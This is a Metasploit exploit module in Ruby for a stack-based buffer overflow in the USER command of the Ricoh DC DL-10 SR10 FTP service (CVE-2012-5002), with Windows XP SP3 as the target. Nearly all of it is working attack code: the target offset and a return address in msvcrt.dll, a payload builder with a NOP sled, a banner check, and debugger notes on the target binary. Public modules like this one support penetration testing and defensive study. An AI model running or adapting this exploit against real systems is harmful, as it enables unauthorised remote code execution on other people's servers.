1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
16
        'Description' => %q{
17
          This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
18
          service.  By supplying a long string of data to the USER command, it is
19
          possible to trigger a stack-based buffer overflow, which allows remote code
20
          execution under the context of the user.
21

22
          Please note that in order to trigger the vulnerability, the server must
23
          be configured with a log file name (by default, it's disabled).
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [
27
          'Julien Ahrens', # Discovery, PoC
28
          'sinn3r' # Metasploit
29
        ],
30
        'References' => [
31
          ['CVE', '2012-5002'],
32
          ['OSVDB', '79691'],
33
          ['URL', 'http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/'],
34
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
35
        ],
36
        'Payload' => {
37
          # Yup, no badchars
38
          'BadChars' => "\x00",
39
        },
40
        'DefaultOptions' => {
41
          'EXITFUNC' => "process",
42
        },
43
        'Platform' => 'win',
44
        'Targets' => [
45
          [
46
            'Windows XP SP3',
47
            {
48
              'Ret' => 0x77c35459, # PUSH ESP; RETN (msvcrt.dll)
49
              'Offset' => 245
50
            }
51
          ]
52
        ],
53
        'Privileged' => false,
54
        'DisclosureDate' => '2012-03-01',
55
        'DefaultTarget' => 0,
56
        'Notes' => {
57
          'Reliability' => UNKNOWN_RELIABILITY,
58
          'Stability' => UNKNOWN_STABILITY,
59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
        }
61
      )
62
    )
63

64
    # We're triggering the bug via the USER command, no point to have user/pass
65
    # as configurable options.
66
    deregister_options('FTPPASS', 'FTPUSER')
67
  end
68

69
  def check
70
    connect
71
    disconnect
72
    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
73
      return Exploit::CheckCode::Appears
74
    else
75
      return Exploit::CheckCode::Safe
76
    end
77
  end
78

79
  def exploit
80
    buf = ''
81
    buf << rand_text_alpha(target['Offset'], payload_badchars)
82
    buf << [target.ret].pack('V')
83
    buf << make_nops(20)
84
    buf << payload.encoded
85

86
    print_status("#{rhost}:#{rport} - Sending #{self.name}")
87
    connect
88
    send_user(buf)
89
    handler
90
    disconnect
91
  end
92
end
93

94
=begin
95
0:002> lmv m SR10
96
start    end        module name
97
00400000 00410000   SR10       (deferred)
98
    Image path: C:\Program Files\DC Software\SR10.exe
99
    Image name: SR10.exe
100
    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
101
    CheckSum:         00000000
102
    ImageSize:        00010000
103
    File version:     1.0.0.520
104
    Product version:  1.0.0.0
105
    File flags:       0 (Mask 3F)
106
    File OS:          4 Unknown Win32
107
    File type:        1.0 App
108
    File date:        00000000.00000000
109
    Translations:     0409.04b0
110
    CompanyName:      Ricoh Co.,Ltd.
111
    ProductName:      SR-10
112
    InternalName:     SR-10
113
    OriginalFilename: SR10.EXE
114
    ProductVersion:   1, 0, 0, 0
115
    FileVersion:      1, 0, 0, 520
116
    PrivateBuild:     1, 0, 0, 520
117
    SpecialBuild:     1, 0, 0, 520
118
    FileDescription:  SR-10
119

120

121
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
122
stable component we can use is msvcrt.dll for now.
123
=end
124

125